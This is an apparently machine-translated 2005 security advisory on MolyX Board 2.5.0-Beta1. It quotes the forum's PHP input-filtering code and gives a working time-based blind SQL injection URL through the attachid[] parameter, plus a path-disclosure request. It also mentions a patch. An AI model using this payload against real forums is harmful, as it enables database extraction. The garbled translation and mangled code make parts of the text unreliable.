Text/SuperHei·Safety Angel[S4T] 2005.09.21
Nonsense:
MolyX Board(hereinafter referred to MXB is MolyX Studios group as if that is CNVBB team development of PHP Forum program, MXB fusion of many forums, absorbing, powerful. The multi-year Forum program finished and improved experience also makes the MXB is more suitable for people’s habits. However, vulnerability is inevitable.
Test version:
MolyX BOARD 2.5.0-Beta1
When you delete the attachment variables attachid[]filter not made, lead to the exposure of the absolute path and sql injection vulnerabilities. The analysis is as follows:
Code line 3 9 7—4 0 7
$affected_ids = count($_INPUT[‘attachid’]);
if ( $affected_ids > 0 ) {
$attachments = $DB->query(“SELECT a.*, p. threadid, p. pid
FROM “. TABLE_PREFIX.“attachment a
LEFT JOIN “. TABLE_PREFIX.“post p ON ( a. postid=p. pid )
WHERE a. attachmentid IN (”. implode(”,”,$_INPUT[‘attachid’]).”)
AND a. userid='”.$ bbuserinfo[‘id’].“'”);
if ( $attachment = $DB->fetch_array($attachments) ) {
if ( $attachment[‘location’] ) {
@unlink( $bboptions[‘uploadfolder’].“/”.$ attachment[‘attachpath’].“/”.$ attachment[‘location’] );
}
We see attachid[]after$_INPUT[‘attachid’]submitted to the database query, we’re more$_INPUT [], the 在 global.php line 2 of 3:
$_INPUT = $forums->func->init_variable();
Continue with init_variable (), the init_variable()in includes/functions. the php code is as follows:
function init_variable()
{
$return = array();
foreach(array($_GET,$_POST) AS $type) {
if( is_array($type) ) {
foreach ( $type AS $k => $v) {
if ( is_array($type[$k]) ) {
foreach ( $type[$k] AS $k1 => $v1) {
$return[ $this->clean_key($k) ][ $this->clean_key($k1) ] = $this->clean_value($v1);
}
} else {
$return[ $this->clean_key($k) ] = $this->clean_value($v);
}
}
}
}
return $return;
}
function clean_key($key)
{
if ($key == “”) return “”;
return preg_replace( array(“/\.\./”, “/\\(.+?)\\/”, “/^([\w\.\-\_]+)$/”), array(“”, “”, “$1”), $key );
}
function clean_value($val)
{
if ($val == “”) return “”;
$pregfind = array ( " ", “&”, “<!–”, “–>” );
$pregreplace = array ( " ", “&”, “<!–”, “–>” );
$val = str_replace($pregfind, $pregreplace, $val);
$val = preg_replace( “/<script/i”, “<script”, $val );
$pregfind = array ( “>”, “<”, “"”, “!”, “'” );
$pregreplace = array ( “>”, “<”, “”", “!”, “'” );
$val = str_replace($pregfind, $pregreplace, $val);
$pregfind = array ( “/\n/”, “/\\$/”, “/\r/” );
$pregreplace = array ( “<br />”, “$”, “” );
$val = preg_replace($pregfind, $pregreplace, $val);
if ( $this->allow_unicode ) {
$val = preg_replace(“/([0-9]+);/s”, “\\1;”, $val );
}
if ( get_magic_quotes_gpc() ) {
$val = stripslashes($val);
}
return preg_replace( “/\\\(|?#)/”, "", $val );
}
Filter& < > \ ’ <script, etc. characters.
The specific test use:
Due to the vulnerability statement the query is not what the data output, so we can not use union directly replace the data output, and tnnd default only administrators
You can only see the forum return mysql error message: db_mysql.php line 1 4 1-1 4 7 code
if ($bbuserinfo[‘usergroupid’]==4) {
$this->error = @mysql_error($this->connection_id);
} else {
$the_error = “;
}
$message = “database error: \n\n”;
$message .= $the_error.”\ n\n";
So ordinary users are not error message is returned, that is, 1=1 and 1=2 to give the page the same, so can not use the“classical injections”in the special code.
Fortunately, we have a benchmark (the).
Note: there can be no& < >and so, we injected the statement structure is as follows:
http://127.0.0.1/xx/uploads/usercp.php?s=&do=attach&sort=&attachid[]=1) and if((ascii(substring(user(),1,1))=0x72)|0, benchmark(1 0 0 0 0 0,md5(0x41)),0)/*
The return delay, then we can determine user()the first letter of the hex value of 0x72, that is the letter r. Note that this process can only be used=
To determine, because the< >have been filtered.:)
When we put$_INPUT[‘attachid’]improper array, when a General variable is submitted, the variable may not implode()and violent wrong, to give the physical path
Submitted to:
http://127.0.0.1/xx/uploads/usercp.php?s=&do=attach&sort=&attachid
Returns: Warning: implode(): Bad arguments. in f:\www\www\xx\uploads\usercp.php on line 4 0 2
Patch:
Official 2 0 0 5. 0 9. 2 0 has been out for patchhttp://www.molyx.com/attachment.php?id=3097&u=2&EXT=txt&attach=1 1 2 7 1 4 6 6 4 7. attach&filename=UPDATE_20050920. txt&attachpath=2
Worth mentioning is, change the patch while patch 2 vulnerabilities, the other one is due to the private. php.$_INPUT[‘pmid’]filter is not strict result of the vulnerability
The use and analysis, keep up with the surface of the Chuck not more, interested can see for yourself(ps: private. php vulnerability not I found, the estimate is official see my test log their find.
This is actually the vulnerability had been patched once.:<http://4ngel.net/article/50.htm> but the angel in the article suffer from a small error, no filtering\and…
Resulting in a win on the host, the vulnerability remains, the vulnerability analysis can see the angel in the article, the exploit: a
You can get the includes/config. php in the content.
Solve version filter… / \
Thank you for reading it!!!